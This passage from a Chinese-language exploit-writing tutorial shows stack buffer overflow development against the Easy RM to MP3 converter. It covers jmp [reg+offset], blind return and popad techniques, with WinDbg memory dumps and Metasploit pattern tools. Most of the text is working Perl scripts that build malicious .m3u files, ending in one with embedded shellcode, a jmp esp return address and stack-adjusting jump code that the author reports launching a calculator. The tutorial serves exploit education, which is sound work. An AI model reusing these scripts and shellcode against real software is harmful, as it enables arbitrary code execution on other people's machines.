print "m3u File Created successfully\n";
</code></pre>
<p>利用成功</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210102172628709-1621477705987.png" class="" title="image-20210102172628709">

<h3 id="4-jmp-reg-offset"><a href="#4-jmp-reg-offset" class="headerlink" title="4. jmp [reg + offset]"></a>4. jmp [reg + offset]</h3><p>如果我们的shellcode再寄存器入口处偏移几个字节的位置，也可以用windbg搜索jmp [reg + offset]指令来跳转过去。</p>
<pre><code>0:010&gt; a
7c92120e jmp [esp+8]
jmp [esp+8]
7c921212 u 7c92120e 
u 7c92120e 
        ^ Bad opcode error in 'u 7c92120e '
7c921212 

0:010&gt; u 7c92120e 
ntdll!DbgBreakPoint:
7c92120e ff642408        jmp     dword ptr [esp+8]
ntdll!DbgUserBreakPoint:
7c921212 cc              int     3
7c921213 c3              ret
7c921214 8bff            mov     edi,edi
7c921216 8b442404        mov     eax,dword ptr [esp+4]
7c92121a cc              int     3
7c92121b c20400          ret     4
</code></pre>
<p>看结果我们可以知道jmp [esp+8]对应的机器码为<code>ff642408</code>，我们可以尝试再其它的dll中搜索包含这条指令的地址，不过我搜索了几个dll没有搜索到这条指令</p>
<h3 id="5-Blind-return"><a href="#5-Blind-return" class="headerlink" title="5. Blind return"></a>5. Blind return</h3><p>此利用主要用于在ESP寄存器指向地址可用字节数不多的情况下，设置跳板跳往可以足够容纳我们shellcode地址的地方去执行的方法。</p>
<p>此项技术基于以下步骤：</p>
<ul>
<li>利用ret指令地址覆写EIP</li>
<li>在ESP首4字节中对shellcode地址进行硬编码</li>
<li>当ret执行时，新添加的4字节（最顶端的值）将从栈中弹出，并赋予EIP</li>
<li>exploit跳至shellcode执行</li>
</ul>
<p>因此这种方法在以下情况是可用的：</p>
<ul>
<li>无法将EIP直接指向某寄存器（因为无法使用jmp或call指令，这意味着你需要对shellcode起始地址进行硬编码）</li>
<li>可控制ESP中的数据（至少能控制前四字节）</li>
</ul>
<p>如果我们想要实现上面的利用方法：</p>
<p>需要拥有shellcode的内存地址（即ESP地址）。</p>
<ol start="2">
<li>在DLL中查找到‘ret’指令的地址</li>
</ol>
<p>先生成一个测试文件来模拟一下堆栈空间</p>
<p>26067个字节A覆盖eip之前的位置+四个字节B覆盖eip + 50个字节的X来作为我们放置跳转指令的地址 + 一段不可用的null</p>
<pre><code class="perl">my $file= "blind_return_1.m3u";
my $junk= "A" x 26067;
my $eip = "BBBB";
my $preshellcode = "X" x 54; #let's pretend this is the only space we have available
my $nop = "\x90" x 230; #added some nops to visually separate our 54 X's from other data
open($FILE,"&gt;$file");
print $FILE $junk.$eip.$preshellcode.$nop;
close($FILE);
</code></pre>
<p>A’s地址距离ESP的偏移</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210112215736411-1621477705987.png" class="" title="image-20210112215736411">

<p>继续往后查看内存，可以看到在ESP+281之后有大段的我们写入的A字符，这表明我们可以使用这段地址来放置我们的shellcode，在X’s位置设置跳转来跳往A’s地址处</p>
<pre><code>eax=00000001 ebx=00104a58 ecx=7c93003d edx=00000004 esi=77c2fce0 edi=000066f3
eip=42424242 esp=000ffd38 ebp=00104678 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
42424242 ??              ???
0:000&gt; d esp
000ffd38  58 58 58 58 58 58 58 58-58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
000ffd48  58 58 58 58 58 58 58 58-58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
000ffd58  58 58 58 58 58 58 58 58-58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
000ffd68  58 58 90 90 90 90 90 90-90 90 90 90 90 90 90 90  XX..............
000ffd78  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffd88  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffd98  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffda8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0:000&gt; d
000ffdb8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffdc8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffdd8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffde8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffdf8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe08  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe18  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe28  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0:000&gt; d
000ffe38  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe48  90 90 90 90 90 90 90 90-00 41 41 41 41 41 41 41  .........AAAAAAA
000ffe58  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe68  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe78  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe88  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe98  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffea8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d
000ffeb8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffec8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffed8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffee8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffef8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff08  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff18  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff28  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d
000fff38  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff48  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff58  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff68  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff78  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff88  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fff98  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fffa8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d
000fffb8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fffc8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fffd8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000fffe8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffff8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00100008  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00100018  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00100028  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d
00100038  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
</code></pre>
<p>现在我们如果想要往字符‘A’的地址放置我们的shellcode的话需要确定ESP+281处的字符‘A’位于我们写入的26067个‘A’的具体位置，这样我们才可以将shellcode防止合适的位置</p>
<ul>
<li>用pattern_create.rb工具来生成1000个字节的字符模型来替换A的前1000个字节。</li>
</ul>
<pre><code>kali@kali:/usr/share/metasploit-framework/tools/exploit$ ./pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
kali@kali:/usr/share/metasploit-framework/tools/exploit$ 
</code></pre>
<p>编写perl脚本，生成测试文件</p>
<pre><code class="perl">my $file= "blind_return_2.m3u";
my $pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B";
my $junk= "A" x 25067;
my $eip = "BBBB";
my $preshellcode = "X" x 54; #let's pretend this is the only space we have available at ESP
my $nop = "\x90" x 230; #added some nops to visually separate our 54 X's from other data in the ESP dump
open($FILE,"&gt;$file");
print $FILE $pattern.$junk.$eip.$preshellcode.$nop;
close($FILE);
print "m3u File Created successfully\n";
</code></pre>
<p>用Easy RM to MP3打开测试文件</p>
<pre><code>eax=00000001 ebx=00104a58 ecx=7c93003d edx=00000004 esi=77c2fce0 edi=000066f3
eip=42424242 esp=000ffd38 ebp=00104678 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
42424242 ??              ???
0:000&gt; d esp
000ffd38  58 58 58 58 58 58 58 58-58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
000ffd48  58 58 58 58 58 58 58 58-58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
000ffd58  58 58 58 58 58 58 58 58-58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
000ffd68  58 58 90 90 90 90 90 90-90 90 90 90 90 90 90 90  XX..............
000ffd78  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffd88  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffd98  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffda8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0:000&gt; d
000ffdb8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffdc8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffdd8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffde8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffdf8  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe08  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe18  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe28  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0:000&gt; d
000ffe38  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe48  90 90 90 90 90 90 90 90-00 35 41 69 36 41 69 37  .........5Ai6Ai7
000ffe58  41 69 38 41 69 39 41 6a-30 41 6a 31 41 6a 32 41  Ai8Ai9Aj0Aj1Aj2A
000ffe68  6a 33 41 6a 34 41 6a 35-41 6a 36 41 6a 37 41 6a  j3Aj4Aj5Aj6Aj7Aj
000ffe78  38 41 6a 39 41 6b 30 41-6b 31 41 6b 32 41 6b 33  8Aj9Ak0Ak1Ak2Ak3
000ffe88  41 6b 34 41 6b 35 41 6b-36 41 6b 37 41 6b 38 41  Ak4Ak5Ak6Ak7Ak8A
000ffe98  6b 39 41 6c 30 41 6c 31-41 6c 32 41 6c 33 41 6c  k9Al0Al1Al2Al3Al
000ffea8  34 41 6c 35 41 6c 36 41-6c 37 41 6c 38 41 6c 39  4Al5Al6Al7Al8Al9
0:000&gt; d
000ffeb8  41 6d 30 41 6d 31 41 6d-32 41 6d 33 41 6d 34 41  Am0Am1Am2Am3Am4A
000ffec8  6d 35 41 6d 36 41 6d 37-41 6d 38 41 6d 39 41 6e  m5Am6Am7Am8Am9An
000ffed8  30 41 6e 31 41 6e 32 41-6e 33 41 6e 34 41 6e 35  0An1An2An3An4An5
000ffee8  41 6e 36 41 6e 37 41 6e-38 41 6e 39 41 6f 30 41  An6An7An8An9Ao0A
000ffef8  6f 31 41 6f 32 41 6f 33-41 6f 34 41 6f 35 41 6f  o1Ao2Ao3Ao4Ao5Ao
000fff08  36 41 6f 37 41 6f 38 41-6f 39 41 70 30 41 70 31  6Ao7Ao8Ao9Ap0Ap1
000fff18  41 70 32 41 70 33 41 70-34 41 70 35 41 70 36 41  Ap2Ap3Ap4Ap5Ap6A
000fff28  70 37 41 70 38 41 70 39-41 71 30 41 71 31 41 71  p7Ap8Ap9Aq0Aq1Aq
</code></pre>
<p>可以看到模式字符串从5Ai6开始，借助pattern_offset.rb工具来定位一下5Ai6在模式字符串中的位置</p>
<pre><code>kali@kali:/usr/share/metasploit-framework/tools/exploit$ ./pattern_offset.rb -q 5Ai6[*] Exact match at offset 257kali@kali:/usr/share/metasploit-framework/tools/exploit$ 
</code></pre>
<p>可以看到这4个字符的偏移量为257，这下我们可以设计我们要放置shellcode的位置，将文件的前257个字节放置不影响shellcode执行的字符，之后加上我们的shellcode然后剩余的字节还是填充为A。</p>
<p>编写perl脚本查看一下内存是否如我们所想的一样</p>
<pre><code class="perl">my $file= "blind_return_3.m3u";my $buffersize = 26067;my $junk= "A" x 250;	my $nop = "\x90" x50;	#250个字节的A加上一些不影响执行的nop（在内存空间足够用的时候在计算的shellcode地址之前填充一些nop指令可以让我们的shellcode适应性更强一点）my $shellcode = "\xcc";my $restofbuffer = "A" x ($buffersize - (length($junk) + length($nop) + length($shellcode)));my $eip = "BBBB";my $preshellcode = "X" x 54; #let's pretend this is the only space we have available at ESPmy $nop2 = "\x90" x 230; #added some nops to visually separate our 54 X's from other data in the ESP dumpopen($FILE,"&gt;$file");print $FILE $junk.$nop.$shellcode.$restofbuffer.$eip.$preshellcode.$nop2;close($FILE);
</code></pre>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210113231801856-1621477705987.png" class="" title="image-20210113231801856">

<p>当程序中断后我们可以看到，NOP起始于0x000ffe51,后面是我们的shellcode（0xCC)，再之后是一串A字符。</p>
<p><em><strong>接下来我们需要在ESP（上图中X的地址）中放入jmpshellcode指令</strong></em>，来帮助我们跳转到ESP+281的位置。</p>
<p>所以我们需要在内存中寻找指令将ESP+281（或者可以稍大一点，因为我们在shellcode前放置了NOP串，这可以使shellcode的设计具有一定的灵活性）然后再使用jmp esp指令跳转到我们shellcode的位置。</p>
<p>这里我们可以寻找三个<code>add esp,0x50e</code>指令，0x5e * 3 = 11Ah &gt; 281(119h)，然后再寻找一个jmp esp指令就构成了我们的jmpshellcode了。</p>
<pre><code>0:010&gt; a
7c92120e add esp,0x5e
add esp,0x5e
7c921211 add esp,0x5e
add esp,0x5e
7c921214 add esp,0x5e
add esp,0x5e
7c921217 jmp esp
jmp esp
7c921219 

0:010&gt; u 7c92120e 
ntdll!DbgBreakPoint:
7c92120e 83c45e          add     esp,5Eh
7c921211 83c45e          add     esp,5Eh
7c921214 83c45e          add     esp,5Eh
7c921217 ffe4            jmp     esp
7c921219 04cc            add     al,0CCh
7c92121b c20400          ret     4
ntdll!NtCurrentTeb:
7c92121e 64a118000000    mov     eax,dword ptr fs:[00000018h]
7c921224 c3              ret
</code></pre>
<p>从上面我们可以知道jumpcode的机器码为：0x83,0xc4,0x5e,0x83,0xc4,0x5e,0x83,0xc4,0x5e,0xff,0xe4</p>
<p>然后我们可以根据前面测试得到的一些信息来修改一下我们的exp，然后运行测试一下jmpcode是否可以覆盖ESP的位置</p>
<pre><code class="perl">my $file= "blind_return_4.m3u";
my $buffersize = 26067;
my $junk= "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc"; #position 300
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 4;
my $jumpcode = "\x83\xc4\x5e" . #add esp,0x5e
"\x83\xc4\x5e" . #add esp,0x5e
"\x83\xc4\x5e" . #add esp,0x5e
"\xff\xe4"; #jmp esp
my $nop2 = "0x90" x 10; # only used to visually separate
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE,"&gt;$file");
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE);
print "m3u File Created successfully\n";
</code></pre>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210129232150356-1621477705987.png" class="" title="image-20210129232150356">

<p>从图中我们可以看到，esp已经被我们的jmpcode覆盖，执行jmpcode后，ESP将会指向0xFFE50~0xFFE7B之间的地址</p>
<p>这样的话，最后我们就只需要将ESP修改为jmp esp指令的地址，来让EIP先指向我们的jmpcode处</p>
<p>在前面的调试中我们找到了一个符合我们要求jmp esp的地址（0x01b9f23a），直接拿来用就好。</p>
<p>调整shellcode布局在预定的shellcode处放置0xcc</p>
<pre><code class="perl">my $file= "blind_return_5.m3u";
my $buffersize = 26067;
my $junk= "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc"; #position 300
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V',0x01b9f23a);
my $preshellcode = "X" x 4;
my $jumpcode = "\x83\xc4\x5e" . #add esp,0x5e
"\x83\xc4\x5e" . #add esp,0x5e
"\x83\xc4\x5e" . #add esp,0x5e
"\xff\xe4"; #jmp esp
my $nop2 = "0x90" x 10; # only used to visually separate
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE,"&gt;$file");
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE);
print "m3u File Created successfully\n";
</code></pre>
<pre><code>eax=00000001 ebx=00104a58 ecx=7c93003d edx=00aa0000 esi=77c2fce0 edi=000065e6
eip=000ffe7c esp=000ffe52 ebp=00104678 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
000ffe7c cc              int     3
0:000&gt; d esp
000ffe52  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe62  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe72  90 90 90 90 90 90 90 90-90 90 cc 41 41 41 41 41  ...........AAAAA
000ffe82  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe92  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffea2  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffeb2  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffec2  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
</code></pre>
<p>可以看到果然中断在了我们预定的地址，接下来我们就可以将0xcc替换为真正的shellcode，同时将字符’A’替换为’NOP’，之后就可以跳入更大的空间，所以只需要跳转188（2 * 5e）即可。</p>
<pre><code class="perl">my $file= "blind_return_6.m3u";
my $buffersize = 26067;
my $junk= "\x90" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca"; #position 300
my $restofbuffer = "\x90" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V',0x01b9f23a);
my $preshellcode = "X" x 4;
my $jumpcode = "\x83\xc4\x5e" . #add esp,0x5e
"\x83\xc4\x5e" . #add esp,0x5e
#"\x83\xc4\x5e" . #add esp,0x5e
"\xff\xe4"; #jmp esp
my $nop2 = "0x90" x 10; # only used to visually separate
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE,"&gt;$file");
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE);
print "m3u File Created successfully\n";
</code></pre>
<p>成功弹出计算器</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210131221051399-1621477705987.png" class="" title="image-20210131221051399">



<h3 id="其它跳转方式"><a href="#其它跳转方式" class="headerlink" title="其它跳转方式"></a>其它跳转方式</h3><ul>
<li>popad</li>
<li>硬编码跳转地址</li>
</ul>
<p>“popad”指令也可以帮助我们跳转到shellcode，popad将从栈ESP中弹出DWORD数据，并赋予各通用寄存器，他按以下顺序加载各寄存器：EDI, ESI, EBP, EDX, ECX, EAX. 因此，每次加载寄存器（popad引起的）时ESP都会递增。一次popad将用掉ESP中的32字节，并以有序的方式将其pop到个寄存器中。</p>
<p>popad的机器码是0x61</p>
<p>假设你需要跳转40字节，而你只有两字节可以用于跳转，那么你可以使用两个popad指令来使ESP指向shellcode（以一串NOP指令开头以弥补我们两次跳过的32bytes - 40bytes大小的空间）。让我们再次以 Easy RM to MP3漏洞来演示这项技术：</p>
<p>我们还使用我们前面用的脚本来练习，伪造一个缓冲区，在ESP处填充13个“X”,然后再放置一些垃圾数据（“D”&amp;“A”）。后面接着放置我们的shellcode（NOPS  + A’s）</p>
<pre><code class="perl">my $file= "test1.m3u";
my $buffersize = 26067;
my $junk= "C" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 17; #let's pretend this is the only space we have available
my $garbage = "D" x 100; #let’s pretend this is the space we need to jump over
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE,"&gt;$file");
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
</code></pre>
<pre><code>eax=00000001 ebx=00104a58 ecx=7c93003d edx=00aa0000 esi=77c2fce0 edi=0000664c
eip=42424242 esp=000ffd38 ebp=00104678 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
42424242 ??              ???
0:000&gt; d esp
000ffd38  58 58 58 58 58 58 58 58-58 58 58 58 58 44 44 44  XXXXXXXXXXXXXDDD
000ffd48  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
000ffd58  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
000ffd68  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
